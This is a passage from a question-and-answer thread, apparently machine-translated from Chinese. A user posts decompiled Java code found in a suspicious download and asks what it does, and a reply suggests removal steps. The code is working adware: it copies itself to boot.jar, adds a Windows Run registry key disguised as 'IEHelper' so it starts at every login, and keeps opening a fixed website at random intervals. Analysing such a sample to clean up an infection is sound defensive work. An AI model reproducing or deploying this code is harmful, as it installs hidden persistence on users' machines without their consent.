-1
我下载一些文件的类型,我观察到的怪异行为和反编译后发现了这段代码 -程序代码的理解[JAVA]
package w1Comlu;
import java.awt.Desktop;
import java.io.File;
import java.io.IOException;
import java.lang.reflect.InvocationTargetException;
import java.net.URI;
import java.net.URL;
import java.nio.file.CopyOption;
import java.nio.file.Files;
import java.nio.file.Path;
import java.security.CodeSource;
import java.security.ProtectionDomain;
import java.util.Random;
import w1Comlu.WinRegistry;
public class Main {
public static void main(String[] args) {
File file = new File(Main.class.getProtectionDomain().getCodeSource().getLocation().getPath());
File newFile = new File(System.getProperty("user.dir"), "boot.jar");
if (!newFile.exists()) {
try {
Files.copy(file.toPath(), newFile.toPath(), new CopyOption[0]);
String value = "\"javaw -jar " + System.getProperty("user.dir") + "\\boot.jar\"";
try {
WinRegistry.writeStringValue((int)-2147483647, (String)"Software\\Microsoft\\Windows\\CurrentVersion\\Run", (String)"IEHelper", (String)value);
}
catch (IllegalArgumentException e) {
e.printStackTrace();
}
catch (IllegalAccessException e) {
e.printStackTrace();
}
catch (InvocationTargetException e) {
e.printStackTrace();
}
}
catch (IOException e1) {
e1.printStackTrace();
}
try {
Thread.sleep(600000);
}
catch (InterruptedException e1) {
e1.printStackTrace();
}
}
String url = "http://w1.comlu.com/";
Desktop desktop = Desktop.isDesktopSupported() ? Desktop.getDesktop() : null;
do {
boolean worked = false;
if (desktop != null && desktop.isSupported(Desktop.Action.BROWSE)) {
try {
desktop.browse(new URI(url));
worked = true;
}
catch (Exception e) {
e.printStackTrace();
}
}
if (!worked) {
new java.lang.ProcessBuilder("x-www-browser", url);
}
try {
Thread.sleep(new Random().nextInt(600) * 1000);
continue;
}
catch (InterruptedException e) {
e.printStackTrace();
continue;
}
break;
} while (true);
}
}
我只能听懂一点的代码,因为我是新来的Java 。有人可以详细说明代码试图做什么吗?
如果我删除了我已经做过的boot.jar文件,该怎么办? :D –
@Ashsh Sharma,也搜索boot.jar的所有用户目录并删除文件。另外考虑查看Windows注册表并删除程序写入的条目,如果你发现一些。 – Berger
任何想法,我应该在哪里检查和在注册表中? –